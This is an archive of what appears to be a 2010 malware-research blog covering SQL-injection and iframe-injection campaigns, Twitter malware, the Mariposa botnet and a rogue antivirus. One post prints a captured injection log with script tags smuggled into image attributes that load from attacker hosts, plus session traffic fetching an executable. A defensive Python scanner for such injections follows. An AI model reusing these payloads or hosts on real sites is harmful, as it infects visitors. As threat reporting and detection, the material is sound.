Author Archive for admin

11 Jun

Robint.us SQLi Utilizing CVE-2010-1297 Exploit

The crew behind the recent massive SQLi campaign is now exploiting the latest Adobe vulnerability, CVE-2010-1297, in its drive-by-download attacks. Yesterday, I created a video demonstrating how Cloud Antivirus blocked the 0day exploit using the new behavioral blocking technology included in the free version. Check that out here:

We recommend patching Adobe and then installing Cloud Antivirus to prevent any future 0day attacks.

Here are some logs of our most recent encounter:

Session traffic:

GET hxxp://2677.in/cnzz.html
200 OK (text/html)

GET hxxp://2677.in/ie.html
200 OK (text/html)

GET hxxp://s11.cnzz.com/stat.php?id=1990191&web_id=1990191
200 OK (text/html)

GET hxxp://2677.in/log.txt
200 OK (text/plain)

GET hxxp://2677.in/anhey.swf
200 OK (application/x-shockwave-flash)

GET hxxp://2677.in/anhey.swf
206 Partial Content (application/x-shockwave-flash)

GET hxxp://zs13.cnzz.com/stat.htm?id=1990191&r=http%3A//www.generationdb.com/&lg=en-us&ntime=0.14859300%201276289711&repeatip=0&rtime=0&cnzz_eid=82761217-1276289711-http%3A//www.generationdb.com/&showp=800x600&st=1276292642&sin=http%3A//www.generationdb.com/&res=0
200 OK (image/gif)

GET hxxp://2677.in/log.exe
200 OK (application/octet-stream)

Injection log:

<table width="96%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2"><img alt="" src="images/5x5.gif" width="5" height="8" /></td>
</tr>
<tr>
<td align="center" class="hoverbox"><a href="#"><img src='upload/community/moresmall_37726110_lego.jpg<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" /><img src='upload/community/large_37726110_lego.jpg<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" class="preview" /></a></td>
<td width="55%" valign="top" class="category">
<a href="unregisteredcommunity.aspx?Com_id='7'" target="_self">We are all</a> ... <br />Category: Groups,<br />Location: USA<script src=hxxp://2677.in/yahoo.js></script></td></tr><tr><td colspan="2">-----------------------------------------</td></tr></table></td>
</tr><tr>
<td>
<table width="96%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2"><img alt="" src="images/5x5.gif" width="5" height="8" /></td>
</tr>
<tr>
<td align="center" class="hoverbox"><a href="#"><img src='upload/community/moresmall_2065474113_IMG_4127.JPG<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" /><img src='upload/community/large_2065474113_IMG_4127.JPG<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" class="preview" /></a></td>
<td width="55%" valign="top" class="category">
<a href="unregisteredcommunity.aspx?Com_id='6'" target="_self">Technosoft</a> ... <br />Category: Business,<br />Location: India<script src=hxxp://2677.in/yahoo.js></script></td></tr><tr><td colspan="2" class="line">-----------------------------------------</td></tr></table></td>
</tr>
</table>
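The injected markup above has one tell-tale shape: a <script src=...> tag smuggled inside a quoted src attribute value, which valid HTML never contains. The following Python scanner is an added example (not part of the original post) that flags that pattern and tallies the external hosts any script tag loads; the sample HTML is constructed from the shape of the log, and the allow-list host is a placeholder.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed sample modelled on the injected markup in the log; not the site's live page.
SAMPLE_HTML = """
<td class="hoverbox"><a href="#"><img src='upload/community/moresmall_37726110_lego.jpg<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" /></a></td>
<td class="category">Location: USA<script src=hxxp://2677.in/yahoo.js></script></td>
<td class="hoverbox"><img src='upload/community/clean_photo.jpg' alt="" /></td>
"""

# A <script src=...> tag; the src may be quoted or bare, as in the captured injection.
SCRIPT_RE = re.compile(r"<script\s+src=['\"]?([^'\"\s>]+)", re.IGNORECASE)
# A quoted src/href attribute value; the injected payload lives inside this value.
ATTR_RE = re.compile(r"""\b(src|href)\s*=\s*(['"])(.*?)\2""", re.IGNORECASE | re.DOTALL)


def injected_scripts_in_attrs(html):
    """Return (attribute, script_url) pairs for script tags nested inside attribute values.

    Legitimate markup never nests a tag inside an attribute value, so any hit is a
    strong indicator of a stored (SQLi-delivered) injection like the one in the log."""
    hits = []
    for attr, _quote, value in ATTR_RE.findall(html):
        for url in SCRIPT_RE.findall(value):
            hits.append((attr.lower(), url))
    return hits


def external_script_hosts(html):
    """Count the host of every external script the page loads, nested in an attribute or not."""
    hosts = Counter()
    for url in SCRIPT_RE.findall(html):
        host = urlparse(url).netloc  # urlparse splits the netloc even for defanged hxxp:// URLs
        if host:
            hosts[host] += 1
    return hosts


def is_suspicious(html, allowed_hosts=()):
    """True if a script is nested in an attribute or loads from a host not on the allow list."""
    if injected_scripts_in_attrs(html):
        return True
    return any(host not in allowed_hosts for host in external_script_hosts(html))


if __name__ == "__main__":
    for attr, url in injected_scripts_in_attrs(SAMPLE_HTML):
        print(f"script nested in {attr} attribute -> {url}")
    for host, n in external_script_hosts(SAMPLE_HTML).most_common():
        print(f"{n}x external script host: {host}")
    # "www.example.com" stands in for the site's own host (placeholder).
    print("suspicious:", is_suspicious(SAMPLE_HTML, allowed_hosts={"www.example.com"}))
```

Running the same check over a crawl of your own pages, or over the text columns the pages are rendered from, surfaces this kind of injection before a visitor's browser does.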

21 May

Twitter Trending Topic Attack

Almost a full year has passed since we discovered the first trending topic attack on Twitter. This time the attack came back in the same fashion, but it was much less aggressive than the prior attack thanks to the swiftly acting Twitter security team.

In this latest attack, the tweets were tied to trending topics such as Justin Bieber, Oil Spill, and Official Twitter App. The tweets all contained the text “haha this is the funniest video ive EVER SEEN!” followed by a link to the malware campaign.

In the following image, you can see the results of a search taken shortly after the attack started. As you can see, the accounts were posting via the Twitter API, so it is safe to assume that the cyber criminals behind the attack used some sort of script to make it all happen.

Twitter_results

Clicking any of the URLs starts a redirection chain to a website where a malicious file is downloaded using the technique known as “drive-by download”, which runs the file automatically on the affected computer without the user’s awareness.

The malware site used for the attack is hxxp://pc-tv.tv/stickam/index2.html

In the following image you can see that the page appears to be loading a Java plugin, supposedly required to view the video:

Twitter_java_site

However, if we look at the code of this website, we can see that it is actually calling an EXE file, which is the malware itself. It has been detected as W32/Lolbot.B.worm.

The code is the following:

Twitter_code

10 May

Twitter hacked by “Turkish Hacker”

This morning I logged into my Twitter account and noticed something strange. My Twitter follower count moved from over 5500 followers to zero instantaneously between reloads! Apparently, a Turkish hacker was able to exploit a bug in the Twitter website which allowed him to force other Twitter accounts to automatically follow him, and suddenly every Twitter account had its follower count rolled back to zero. Many Twitter users immediately tweeted about the issue and several celebrities chimed in:

Ashton Kutcher: twitter is being hacked by some turkish hacker. haha I have 0 followers.

Justin Bieber: so i woke up here in LA and Twitter has been hacked. Turns out I am no longer popular … hackers i send a warning…u have now pissed off over 2 million teenage girls. They are more dangerous than Navy Seals.

Jim Carrey: Imagine if this hacker put his/her talent 2 some worthy use. They could 1 day have more than a false sense of superiority. They’d #BOING ;^>

Alyssa Milano: Ummmmm….. Where did my followers go @Twitter?

Mark Indelicato: It says that I have 0 followers……

Stephen Collins (7th Heaven): According 2 Twitter they’ve fixed a bug/hack that re-set following/follower #s to 0. Scary. So far, my acct isn’t re-set. Holding breath.

Joe Jonas: Wait.. So this means I have to “talk” to my friends?

The bug was first discovered in a Turkish website, which I have attempted to translate (any of our Turkish viewers willing to submit a better translation?) with Google Translate:

I know that I do not think this bug. twiti accept that start with a code that identifies the code as written should be. twitter is too flat or system that is quite a simple system they write, next to facebook. entered with the data sent by the same function, they showed twiti. After all, if you want to send a data in a way and this is a bug if you send a code to be written against it, by entering a twit you’ve done the easy way ha, ha hard way. When the easy way to write the entire code is perceived as most likely. I would not do so even if I was, anyway.

hide profile sent to people who question the follower They’ll accept bids for your keywords, if you request a follow no action will be taken. so simple.

note: I’m speaking without knowing, I have no programming knowledge about the particles. I like to rant, swh.

It’s still a bit unclear who this Turkish hacker is, although it may be safe to assume that one of the now-suspended accounts (@borakrc) mentioned in the above Turkish blog is his. The Twitter staff has acknowledged the bug and has already taken remediation steps to fix the error.

07 May

PHPnuke.org hacked via iframe injection

PHP-Nuke, a popular web-based portal and content management solution written in PHP, has been criticized in the past for the slew of security vulnerabilities affecting its platform. Today, the main PHP-Nuke website has been, well, nuked. A malicious iframe has been injected into the main site (still active) and, like the previous attack on the US Treasury website, this campaign also uses the Eleonore exploit pack to distribute the malware.

Upon visiting the main PHP-Nuke website (still active), the iframe redirects through a series of exploit attempts, which include Adobe Collab overflow, getIcon, and doc.media.newPlayer vulnerabilities.

malicious iframe redirector – php-nuke

After the initial iframe redirection, the second iframe redirection starts and statistics servers (hosted in Russia) are accessed.

second stage iframe redirection/statistic collection

After the second stage is completed, the third stage starts and the exploitation attempts begin.

3rd stage – obfuscated code – exploitation attempts

If any of the exploit attempts succeeds, the CI.A Trojan is executed on the victim’s computer.

Lately, we’ve noticed an uptick in usage of the Eleonore exploit kit, and judging from the site variable in the URL (e.g. site=phpnuke.org), we’re guessing that this isn’t the only site they are targeting in this attack.

06 May

Inside Mariposa – The Largest Botnet Takedown in History

Download the PDF version here.

In May 2009, Defence Intelligence, a private information security firm based in Canada, began investigating a suspicious new malware sample that was communicating with Command & Control (C&C) servers located in Spain. The name “Mariposa,” the Spanish word for butterfly, was given to the botnet by Defence Intelligence researchers after several months of probing. The early suspicion proved accurate: further investigation eventually led to the discovery of 13 million newly infected machines communicating with the C&C servers. This rapid growth urgently signaled the need for an international coalition to conduct the research, investigation, and takedown of the largest botnet ever recorded.

The result was the Mariposa Working Group, composed of several experts in the information security sector including Defence Intelligence, Panda Security, the Georgia Tech Information Security Center, the FBI and the Spanish Civil Guard. The focus of the group was to identify and eradicate the botnet, as well as bring the cyber criminals to justice.

During the initial stages of research, the Mariposa Working Group discovered that the Mariposa botnet was masterminded by an amateur-run group of several spirited script kiddies named Días de Pesadilla (DDP), which translates to “Nightmare Days Team.”  Uncovered underground forum communication showed that instead of building a complex self-coded botnet infrastructure, the DDP team leveraged the underground community to buy the tools that they needed to build the 13 million strong botnet. In fact, the botnet operators even leveraged the widely popular Zeus crimeware kit, which is a do-it-yourself tool used by many amateur botnet operators today.

The DDP team also bought malware tools (crypters, packers, kits, etc.) on these forums to sell to other members. DDoS services, adware/toolbar installs and botnet rental (primarily for credential harvesting) were among the favorites, and it was through this underground forum that the Mariposa botnet became a financially viable tool for the cyber criminals.

The underground communication also enabled the Mariposa Working Group to identify the botnet leader, who was known only by the handle “Netkairo.” Tracking the operator became very difficult, as he only used anonymous VPN services to connect to the botnet infrastructure. The chances of catching the operator were slim, so a more aggressive approach was taken to cease all activity. On December 23rd, 2009, the Mariposa botnet was effectively taken over by rerouting the command-and-control servers’ DNS records to a sinkhole. Nearly 13 million infected machines immediately began sending beacon signals to the sinkhole, and it was at this time that the Mariposa Working Group identified infections in government computers, universities and more than half of the nation’s Fortune 1000 companies.

In a last-ditch effort to regain control of the botnet, Netkairo frantically connected to the botnet infrastructure using his home broadband connection. He was able to temporarily regain control of the botnet and subsequently launch a denial of service attack on Defence Intelligence, nearly taking an entire ISP down in the process. This single action proved to be a fatal mistake and the linchpin in unraveling the entire DDP team. The Mariposa Working Group worked in conjunction with Netkairo’s ISP to identify the botnet master’s whereabouts, and on February 3rd, 2010 the Spanish Civil Guard quickly moved to arrest the 31-year-old Spaniard at his home in the Basque region of Spain. The investigation of Netkairo’s personal computer led to the discovery of various types of stolen data including bank account details, credit card numbers, user names and passwords from approximately 800,000 victims, as well as evidence which led to the capture of another two Spanish members of the gang: J.P.R., 30, a.k.a. “jonyloleante”, and J.B.R., 25, a.k.a. “ostiator,” who were both arrested on February 24th, 2010.

Victims of Mariposa include home users, companies, government agencies and universities in more than 190 countries.  Christopher Davis, CEO of Defence Intelligence, illustrates the significance of these infections with this one statement: “It would be easier for me to provide a list of the Fortune 1000 companies that weren’t compromised, rather than the long list of those who were.”

The investigation is still ongoing, but preliminary calculations of the losses through fraud, financial theft, data loss and cleanup costs are estimated to be in the millions of dollars.  Analysis of Netkairo’s hard disks revealed a complex network of suppliers offering a range of services including hacking of servers to be used as control servers, encryption services to make the bots undetectable by antivirus programs, anonymous VPN connections to administer the botnet, etc.  There is also a similarly complex network of clients, prepared to rent part of the botnet, to buy stolen credit cards, or pay for the installation of toolbars. The gang also stole directly from bank accounts, using money mules in the United States and Canada, and laundered money through online poker games.

Cases like Mariposa demonstrate the growing trend of amateur-run botnets. Do-it-yourself kits like ZeuS, SpyEye, Eleonore, and many others are widely available on the Internet underground, and it’s these tools that allowed the amateurs behind the Mariposa botnet to build a 13 million strong victim pool. Fortunately, as cybercriminal attacks continue to increase in frequency and sophistication, the information gleaned from them helps security vendors develop new tools and law enforcement agencies develop new strategies for bringing these criminals to justice.

04 May

United States Treasury Website Hacked to Spread Eleonore Exploit Pack Malware

Time and time again we talk about how amateur and professional hackers alike are able to use automated toolkits which identify security vulnerabilities on a computer and exploit them with little or no technical skill required of the cyber criminal. The spirited script kiddies behind these kits have been wreaking havoc on the Internet, as many of the kits available can be downloaded in underground forums for free. Today, we came across an embedded iframe inside the Department of Treasury website. This iframe (pictured below) is used to silently load one of the Eleonore exploit kit’s main URLs, which in turn determines the best available exploitation method for the browser accessing the site.

US Treasury Website – Injected iframe

Upon accessing the US Treasury website (treas.gov, bep.gov, or moneyfactory.gov), the iframe silently redirects victims through statistic servers and exploit packs which will carry the victim onto the second stage of the attack.

US Treasury Website Hack (Session Log)

In my case, the exploit kit decided that Java was the best method of infecting my test machine, although several exploitation methods (mainly PDF) are used by these kits. It’s still unclear what the original entry point into the US Treasury website was, and I don’t expect the US Government to release a detailed report about the compromise, but these threats usually make their way onto websites through outdated server software, outdated web applications, and/or web application security vulnerabilities such as SQL injection.

After you are infected, your web browser will start redirecting you to ads and other nasty things, such as Rogueware:

Rogueware spread by US GOV website

I would like to use this post to remind you all to update your web applications and web servers just as frequently as you would your own computer. Doing so will help prevent your website from being hacked and used to propagate these threats on the Internet. You, your visitors, and everyone else browsing the Internet will be one step closer to a safer browsing experience.

11 Mar

Demonstrating the latest IE vulnerability

Yesterday, Microsoft issued a security advisory for an unpatched and actively exploited invalid reference pointer vulnerability in the Internet Explorer 6 and 7 web browsers. In the attack we observed, the exploit code loads the TDSS.CQ trojan, which is designed to steal personal and sensitive data. Only versions 6 and 7 of Internet Explorer are vulnerable, but you can take additional steps to avoid it by using an alternative browser such as Firefox or Opera, or by upgrading to Internet Explorer 8.

I went ahead and put together a little video to show you all how the exploit works:

Note: Originally posted on the PandaLabs blog.

25 Jan

New Rogue: Total Defender

PandaLabs reports that a new Rogue Antivirus program called Total Defender appeared over the weekend.

The following data is included for informational purposes only. Please do not attempt to view or download files from the website.

Domain: Total-Defender. com
IP: 94.247.2.41
Country: Latvia
Host: DATORU EXPRESS SERVISS Ltd.
Organization: ZlKon

File: total-defender-setup.exe

Total Defender Rogue Antivirus

Connects to:

0    200    HTTP    94.247.2.41    /ck.php    21
1    200    HTTP    94.247.2.41    /tdd.php?i=1
2    200    HTTP    94.247.2.41    /ck.php
3    301    HTTP    94.247.2.41    /tdp.php?ak=24DIGITHASH
4    200    HTTP    CONNECT    pp-pay.net:443
5    200    HTTP    CONNECT    pp-pay.net:443
6    200    HTTP    CONNECT    pp-pay.net:443
7    200    HTTP    CONNECT    bill-support.com:443

Additional Info:

An interesting thing we noticed is that the Rogue did not attempt to scare us into purchasing it; instead it told us that the computer was secure after the scan. The Rogue authors are probably doing this to keep a high number of Rogue installations active for the purposes of data theft or for-hire services.

Total Defender Rogue Antivirus
